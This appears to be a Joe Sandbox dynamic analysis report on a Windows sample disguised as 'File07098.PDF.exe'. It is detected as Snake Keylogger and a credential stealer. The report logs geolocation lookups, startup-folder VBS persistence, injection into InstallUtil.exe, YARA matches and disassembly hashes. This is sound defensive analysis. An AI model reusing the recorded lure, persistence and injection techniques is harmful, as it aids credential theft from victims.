                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMMN%2FWYsLdlSfBlIDm5fjG0c2qRNAkzAFdanWubm2fzLbYUhFLoD83oJhMswqvuKeqhEFyK%2B%2B%2B7k6GlltjIEOEcDmlNy3UYWAXXzhUSh9XdAPTPGiuGQ1uDlGg5DIW64xy1Z6TGq"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983cd8f32466c-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1219&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2490111&cwnd=251&unsent_bytes=0&cid=87df8b6acb37132e&ts=159&x=0"
                                                      2024-10-30 06:58:05 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      17 | 192.168.2.5 | 49825 | 188.114.96.3 | 443 | 6204 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:58:07 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:58:07 UTC | 894 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:07 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19510
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s8lm2JLfdesCtV6%2BOuUqVt%2B0EJL1Jsl%2BFuOZ%2Bs%2BsaGKPTQycGxMzWDYqt9%2BZH%2FlaEOWjJZEXKYy4XElNoSoKLAi47Pq10Vvrydd9kgorI4vx8V6%2FP52s7r072AjNbzSQ7kmh0yzz"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983db08782cd7-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1175&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2407315&cwnd=32&unsent_bytes=0&cid=55f3e6355c277d07&ts=697&x=0"
                                                      2024-10-30 06:58:07 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Target ID:0
                                                      Start time:02:57:29
                                                      Start date:30/10/2024
                                                      Path:C:\Users\user\Desktop\File07098.PDF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\File07098.PDF.exe"
                                                      Imagebase:0xa0000
                                                      File size:130'048 bytes
                                                      MD5 hash:71360D65665D164B175A5A73964E96EC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2097674143.0000000005FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2078600685.0000000002476000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:02:57:35
                                                      Start date:30/10/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                      Imagebase:0x8d0000
                                                      File size:42'064 bytes
                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4484950182.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:02:57:47
                                                      Start date:30/10/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs"
                                                      Imagebase:0x7ff6241f0000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:02:57:48
                                                      Start date:30/10/2024
                                                      Path:C:\Users\user\AppData\Roaming\Current.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\Current.exe"
                                                      Imagebase:0x7d0000
                                                      File size:130'048 bytes
                                                      MD5 hash:71360D65665D164B175A5A73964E96EC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 63%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:02:57:53
                                                      Start date:30/10/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                      Imagebase:0xc0000
                                                      File size:42'064 bytes
                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4483465030.0000000002639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4483465030.0000000002471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                        • Opcode ID: 602992a5d2834767f3e36df6a6adbb0bc3b7282efea11a6d32aa1783f5b66085
                                                        • Instruction ID: 1efcecebaede9b32646d8e71580b7cf4d2790bee62ea37e5d89bbfe85afe832d
                                                        • Opcode Fuzzy Hash: 602992a5d2834767f3e36df6a6adbb0bc3b7282efea11a6d32aa1783f5b66085
                                                        • Instruction Fuzzy Hash: 48816B78E04904CFDB04EBA8C494BAAB7F2EB84310F69C5A5D805AF655C3B4AD85CF51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10d8204d73aad2e84efdf42af39f7dced092ab3198154824a5c1d911010ad0cf
                                                        • Instruction ID: 534e3da31755027f6dc145693af002abbde6975762f365ab6863fbbfe0071c79
                                                        • Opcode Fuzzy Hash: 10d8204d73aad2e84efdf42af39f7dced092ab3198154824a5c1d911010ad0cf
                                                        • Instruction Fuzzy Hash: BC917674A14204DFE714EF18D488BA9B7F2FB84318F648AA4E405AF6A5E334EC85DF51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 78d945b4da466781b680b0887e892d7cebc64744df32dac0e011eb6708635721
                                                        • Instruction ID: c1a2fa126808200c56c2a27e9014e658cbac759ab048d3fde90b353c259b310f
                                                        • Opcode Fuzzy Hash: 78d945b4da466781b680b0887e892d7cebc64744df32dac0e011eb6708635721
                                                        • Instruction Fuzzy Hash: E5815774A14204DFE714EF58D488BA9B3F2FB88318F648A64E405AF695E334EC81DF51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e7284ec62b44eaf037fbe03a6b9d58938e5b3ee8b860acd77417bfc9ec58900
                                                        • Instruction ID: 3f9027df8643391030d8e23880f6c9641046065255376d17775fe074e3ab3fc0
                                                        • Opcode Fuzzy Hash: 6e7284ec62b44eaf037fbe03a6b9d58938e5b3ee8b860acd77417bfc9ec58900
                                                        • Instruction Fuzzy Hash: EC712770E05228CFDB10CFA9CA85BADBBF2FB59308F5085A9D049A7654E775A984CF00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (wq$Hwq
                                                        • API String ID: 0-584953801
                                                        • Opcode ID: 2bcca4cf563ec7525f116bde3df01ee88aacdd53c35638f545ba882bd26a4d67
                                                        • Instruction ID: e05308705a611e37cb8752c6d3b10b69211d4b5e56f893f347235f8fd845cb16
                                                        • Opcode Fuzzy Hash: 2bcca4cf563ec7525f116bde3df01ee88aacdd53c35638f545ba882bd26a4d67
                                                        • Instruction Fuzzy Hash: 624121312047508FD365DF3AC48034ABBF2AF90714F108A2EE09A8B2E1DB38EC45CB90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: pwq
                                                        • API String ID: 0-3750715768
                                                        • Opcode ID: 7c1bec1c65e3ad4e10839efd74f966e56c86fe45016f35df67eece05cd5b8db5
                                                        • Instruction ID: 9bf234c6845f50f00d61018037f3eb7427faa4fb1d3304f9450358907ba4ee5c
                                                        • Opcode Fuzzy Hash: 7c1bec1c65e3ad4e10839efd74f966e56c86fe45016f35df67eece05cd5b8db5
                                                        • Instruction Fuzzy Hash: 7E512E76610104AFCB459FA8D945D69BBF7FF8C31471580A8E2099B372DA32DC22EB51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (wq
                                                        • API String ID: 0-1062398946
                                                        • Opcode ID: 3058329ffa856b8c380cb9d8316cbdba3a91391bc22b0a7e6fc789bb96f53fa4
                                                        • Instruction ID: 40073e728bd437339a5158668ba721a8b86cc41470abd8d7e398bdd7afca96c2
                                                        • Opcode Fuzzy Hash: 3058329ffa856b8c380cb9d8316cbdba3a91391bc22b0a7e6fc789bb96f53fa4
                                                        • Instruction Fuzzy Hash: 6751F331B046268FCB01DF68D48496AFBB6FF86324B1586AAE5559B342D730FC52CBD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \ssq
                                                        • API String ID: 0-3577270928
                                                        • Opcode ID: 30965c4c48fb882dd83d6d77273c9f2a292cb42d760af96a30c667c764e5d785
                                                        • Instruction ID: 67f69abaf819f13d2c46342dde455bb85e62397312c890d9c7dfeb3fbcac5c68
                                                        • Opcode Fuzzy Hash: 30965c4c48fb882dd83d6d77273c9f2a292cb42d760af96a30c667c764e5d785
                                                        • Instruction Fuzzy Hash: C3417D75B00900CFE710EBB9D884BAAB7F6EB84320F61C57AD919D7660D7349D418B51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,wq
                                                        • API String ID: 0-2764286452
                                                        • Opcode ID: 5cdec2b3a4a5473cecd7a6aeae9f83644990ec9c289134353f9c8c85bb92451b
                                                        • Instruction ID: 4922cafbb38404d087c36683313051a1ea75fc5cb66474fed0611120b36dcebd
                                                        • Opcode Fuzzy Hash: 5cdec2b3a4a5473cecd7a6aeae9f83644990ec9c289134353f9c8c85bb92451b
                                                        • Instruction Fuzzy Hash: 5541AB757002148FCB04EF68C9908AEBBF2FF85311B51856AE905DB361DB30EC02CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \ssq
                                                        • API String ID: 0-3577270928
                                                        • Opcode ID: afcf8c60bc652af78defd4a47cc710587635bb8908b48cefc557a636ecd9ec0e
                                                        • Instruction ID: 77b542ec81b56844258cc8ba278bd4116279f66d34c6270d24e1e1a12738166a
                                                        • Opcode Fuzzy Hash: afcf8c60bc652af78defd4a47cc710587635bb8908b48cefc557a636ecd9ec0e
                                                        • Instruction Fuzzy Hash: 87310275B04900CFE710EBB9D884AAAB7F6FBC4320F20C5BAD4199B661C7308D45CB51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (wq
                                                        • API String ID: 0-1062398946
                                                        • Opcode ID: 20e72ed050be031d8e5a926b43cdd3549b45d63d38ca26cf5e9c6e16848ce7a9
                                                        • Instruction ID: 9a126e48eeef8fa26d7dc929f62f9b9faf4dd94e8d3c0e23cd5fa4a4bc9af891
                                                        • Opcode Fuzzy Hash: 20e72ed050be031d8e5a926b43cdd3549b45d63d38ca26cf5e9c6e16848ce7a9
                                                        • Instruction Fuzzy Hash: F521F835304251AFDB15AF69E8449AE7FA7EFC9320B54417AF908CB391DE729C11C790
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,wq
                                                        • API String ID: 0-2764286452
                                                        • Opcode ID: 9af57205e53afe2875c871bba8e911307c61eb9a7b657cae5f1cee54fb7e7ffb
                                                        • Instruction ID: 2b61f16adbcd010efd7d2000f58aa79b59b4757f55f3113755da2d45bddb8f99
                                                        • Opcode Fuzzy Hash: 9af57205e53afe2875c871bba8e911307c61eb9a7b657cae5f1cee54fb7e7ffb
                                                        • Instruction Fuzzy Hash: 54216A35600215CFCF04DF69C9949AEBBF2EF95301B1581AAE945DB366DB70EC01CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F
                                                        • API String ID: 0-1304234792
                                                        • Opcode ID: b17f744f145174cf403f17ce10852471163826618c82950edcf1f26d820b1c15
                                                        • Instruction ID: add77467b0721f0c1ba4ffa57eda9990723d51a260796beaa6127182562df3cc
                                                        • Opcode Fuzzy Hash: b17f744f145174cf403f17ce10852471163826618c82950edcf1f26d820b1c15
                                                        • Instruction Fuzzy Hash: 0821FAB4A00228CFCBA0DF24D98579DBBB1AB49304F4051DAE68DA7351DB316EC5CF0A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tesq
                                                        • API String ID: 0-136783293
                                                        • Opcode ID: 74f1355bf7cc00d24dcc6e044a777501e03bb0e5518a903f6f2844595eda3dcb
                                                        • Instruction ID: 68228975f2da4de4d15e54484ec61cfd280b2d0a1907c1b9478897b3e9949c4a
                                                        • Opcode Fuzzy Hash: 74f1355bf7cc00d24dcc6e044a777501e03bb0e5518a903f6f2844595eda3dcb
                                                        • Instruction Fuzzy Hash: B601C4B4A01298CFCB50DFA8D5957DDBBB5BB49304F5085A6E40AA7345CB346D84CF01
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: u
                                                        • API String ID: 0-4067256894
                                                        • Opcode ID: 795fc7ab59a15324cf148e2731fe5bb6feb4dcea1f918a7a5afa81c2e9b1ab64
                                                        • Instruction ID: 23ec15964526eef226eee4cf8ca23d7d9e15f3b2ef03087e82125547ae412747
                                                        • Opcode Fuzzy Hash: 795fc7ab59a15324cf148e2731fe5bb6feb4dcea1f918a7a5afa81c2e9b1ab64
                                                        • Instruction Fuzzy Hash: 48D05E74D087A4CFDF10CF24C88438EB6B0FF15340F0011D6D8499A206D77457849F86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: pAp
                                                        • API String ID: 0-316128826
                                                        • Opcode ID: ac103f0bff9fb1129b2e15c924230edd146f5cafed8a25632875aba311614067
                                                        • Instruction ID: 48c64907a4e66b33c020107be5621dc0f0331264c7d369bcc9330fdcf64ee468
                                                        • Opcode Fuzzy Hash: ac103f0bff9fb1129b2e15c924230edd146f5cafed8a25632875aba311614067
                                                        • Instruction Fuzzy Hash: 5FD0C9B090110ACBCF08EBA4E58169DB7B5EF44304F101629E10567284CB343E06DB51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d353dcb9d28ad19a4a191f2938abd9a0cc167cc8b7974a921ef366d432e2b231
                                                        • Instruction ID: 5d63a312f4234d4da17729e4d008fe01fe5c00ba9b535f24aa20ab7c86638773
                                                        • Opcode Fuzzy Hash: d353dcb9d28ad19a4a191f2938abd9a0cc167cc8b7974a921ef366d432e2b231
                                                        • Instruction Fuzzy Hash: F8A1C031B012249FCB05DFA5D544AADBBB2FF99315F24806AE451DB381CB35ED42CB60
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb1e8822541532dc48323ec1be948f349886d7a144dde1d327ecb2c599fb426e
                                                        • Instruction ID: 8eb408f47d40fef5390d72f963b39d55631952d938eca1efb8332a767fab07f3
                                                        • Opcode Fuzzy Hash: eb1e8822541532dc48323ec1be948f349886d7a144dde1d327ecb2c599fb426e
                                                        • Instruction Fuzzy Hash: 9951A0B4B00104DFDB14EF69E488BA9B7FBFB88311F258165E4099B7A5CB749C82CB51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75d7d70ac41d58e90ef5a77d65f374c4476bcf61a11ce2d7df85729c7f3cce31
                                                        • Instruction ID: 5f599c767ac068d7beda40c36bdf284280a3f4966ffb3ff38448c5c820894ee7
                                                        • Opcode Fuzzy Hash: 75d7d70ac41d58e90ef5a77d65f374c4476bcf61a11ce2d7df85729c7f3cce31
                                                        • Instruction Fuzzy Hash: 8951C1B4B00104DFDB14EF69E488BA9B7FBFB88311F158165E4099B7A5CB74AC82CB51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 275d27a28b29981de27e862c9092eec6eeabfeaeec64e9f892825ee6ce56ae10
                                                        • Instruction ID: d28ab6c40bdf19dc17030d95792b8c96e01de6d399f3f18fa2da4bbab94dc538
                                                        • Opcode Fuzzy Hash: 275d27a28b29981de27e862c9092eec6eeabfeaeec64e9f892825ee6ce56ae10
                                                        • Instruction Fuzzy Hash: 41415930B00315DFDB15EB68D994FAABBB7FB98308F14842AE8459B790DB30E841CB50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
